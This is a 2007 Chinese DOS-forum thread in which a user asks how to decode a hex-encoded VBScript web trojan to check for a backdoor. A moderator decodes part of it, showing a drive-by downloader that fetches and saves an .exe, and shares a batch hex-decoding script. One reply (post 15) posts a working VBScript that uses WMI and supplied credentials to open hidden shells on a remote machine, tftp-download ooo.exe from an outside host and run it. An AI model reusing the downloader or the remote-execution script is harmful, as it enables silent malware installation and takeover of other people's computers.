中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » 请问这一段VBScript应该如何解密.. 郁闷啊``(lxmxn。。)
« [1] [2] »
作者:
标题: 请问这一段VBScript应该如何解密.. 郁闷啊``(lxmxn。。) 上一主题 | 下一主题
kkapskok
初级用户





积分 29
发帖 10
注册 2007-6-4
状态 离线
『楼 主』:  请问这一段VBScript应该如何解密.. 郁闷啊``(lxmxn。。)

<script language="VBScript">
C="0d6f6e206572726f7220726573756d65206e6578740d6375726c3d22687474703A2F2F7777772E62616964752E636F6D2F62616964752E657865220d666e616d65313d2263696b652e657865220d666e616d65323d2263696b652e766273220d536574206466203d20646f63756d656e742e637265617465456c656d656e7428226f626a656374222"
C=C+"90d64662e7365744174747269627574652022636c6173736964222c2022636c7369643a42443936433535362d363541332d313144302d393833412d303043303446433239453336220d7374723d224d6963726f736f66742e584d4c48545450220d5365742078203d2064662e4372656174654f626a656374287374722c2222290d43313d2241646f220d43323d2264622e220d43333d22737472220d43343d"

这到底应该用什么工具来解密啊!! .. 查后门要紧啊!!!:(

[ Last edited by kkapskok on 2007-6-13 at 10:45 PM ]

2007-6-13 02:44
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
baomaboy
银牌会员





积分 1513
发帖 554
注册 2005-12-30
状态 离线
『第 2 楼』:  

你根本没发完,谁也解不了



好多菩提树,好多明镜台。本来好多物,好多的尘埃。
2007-6-13 03:41
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lxmxn
版主




积分 11386
发帖 4938
注册 2006-7-23
状态 离线
『第 3 楼』:  我得到的结果



  Quote:
on error resume next
curl="http://www.baidu.com/baidu.exe"
fname1="cike.exe"
fname2="cike.vbs"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4=

[ Last edited by lxmxn on 2007-6-13 at 04:25 PM ]

2007-6-13 14:54
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
dikex
高级用户

潜水修练批处理



积分 788
发帖 366
注册 2006-12-31
状态 离线
『第 4 楼』:  

网马常用的转换为16进制ASCII码;

不过如果加了偏移等,楼主只是发这些数据是不能解开的



正在潜水修练的批处理小白
2007-6-13 18:59
查看资料  发短消息 网志   编辑帖子  回复  引用回复
kkapskok
初级用户





积分 29
发帖 10
注册 2007-6-4
状态 离线
『第 5 楼』:  

厉害的版主 能解开啊。。。  能请问下用什么方法解密的吗`` 我急需去找看看有没有后门。。。。

2007-6-13 22:31
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
meayjun
初级用户





积分 24
发帖 8
注册 2007-6-13
状态 离线
『第 6 楼』:  

楼猪厉害

2007-6-13 22:33
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
kkapskok
初级用户





积分 29
发帖 10
注册 2007-6-4
状态 离线
『第 7 楼』:  

我厉害什么哦。。。。 是板主厉害啊,,, 能请教下 是怎么解密的吗。。 急需去看看有没有后门。。急死。。

2007-6-13 22:34
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
kkapskok
初级用户





积分 29
发帖 10
注册 2007-6-4
状态 离线
『第 8 楼』:  

请版主快快进来一下 能请教下 是怎么解密的吗。。。 太急了。。

2007-6-13 22:45
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lxmxn
版主




积分 11386
发帖 4938
注册 2006-7-23
状态 离线
『第 9 楼』:  

那好,我就把我的脚本发出来吧。

新手学习,高手勿笑。

需要外部工具 sed 、grep。
@echo off&SetLocal EnableDelayedExpansion
cd.>ok.txt
if "%1"=="" (set /p file=Please input the file to be cope with:) else (set file=%1)
for /f %%a in ('grep -o ".." %file%') do (
        set /a asc=0x%%a
        set str=!str!+chr^(!asc!^)
)
set str=""%str%
echo a=%str%:wscript.echo a>__temp.vbs
cscript.exe //nologo __temp.vbs|sed "s/\x0D/\x0d\x0a/g"|more>%~dp1.\ok.txt
del __temp.vbs&start %~dp1.\ok.txt


   此帖被 +3 点积分       点击查看详情   
评分人:【 stornager 分数: +3  时间:2007-6-24 15:55


2007-6-14 00:05
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lxmxn
版主




积分 11386
发帖 4938
注册 2006-7-23
状态 离线
『第 10 楼』:  

%file% 是指的只含有16进制数码的文本。

2007-6-14 00:06
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
kkapskok
初级用户





积分 29
发帖 10
注册 2007-6-4
状态 离线
『第 11 楼』:  

谢谢!! 十分感谢版主!  谢谢分享!!

2007-6-15 01:02
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lililulula
中级用户





积分 302
发帖 138
注册 2007-3-29
状态 离线
『第 12 楼』:  

好久不来 斑竹功力大增~~~

2007-6-15 10:45
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lxmxn
版主




积分 11386
发帖 4938
注册 2006-7-23
状态 离线
『第 13 楼』:  



  Quote:
Originally posted by lililulula at 2007-6-15 10:45:
好久不来 斑竹功力大增~~~

兄过奖了,我只会弄简单的,难的就不会了。o_O

2007-6-15 11:07
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
hazjs
初级用户





积分 60
发帖 25
注册 2007-6-24
状态 离线
『第 14 楼』:  求各位老大帮我也解密下,先谢谢你们了

谢谢老大帮我解密了

[ Last edited by hazjs on 2007-6-25 at 07:18 AM ]

2007-6-24 08:56
查看资料  发短消息 网志   编辑帖子  回复  引用回复
slore
铂金会员





积分 5212
发帖 2478
注册 2007-2-8
状态 离线
『第 15 楼』:  

Const HIDDEN_WINDOW = 12
strComputer = wscript.arguments(0)
strUserName = wscript.arguments(1)
strPassWord = wscript.arguments(2)
Set objSWbemLocator = CreateObject("wbemscripting.swbemlocator")
Set objSWbemServices = objSWbemLocator.ConnectServer(strComputer,"root\cimv2",strUserName,strPassWord)
Set objStartup = objSWbemServices.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objSWbemObject = objSWbemServices.Get("Win32_Process")
bat = objSWbemObject.Create("cmd.exe /c echo tftp -i 676757.vicp.net get ooo.exe>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c echo ping -n 20 127.1>>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c echo ooo.exe>>ftp.bat", Null, objConfig, intProcessID)
bat = objSWbemObject.Create("cmd.exe /c ftp.bat", Null, objConfig, intProcessID)

   此帖被 +3 点积分       点击查看详情   
评分人:【 stornager 分数: +3  时间:2007-6-24 15:57


2007-6-24 10:11
查看资料  发短消息 网志   编辑帖子  回复  引用回复
« [1] [2] »
请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转: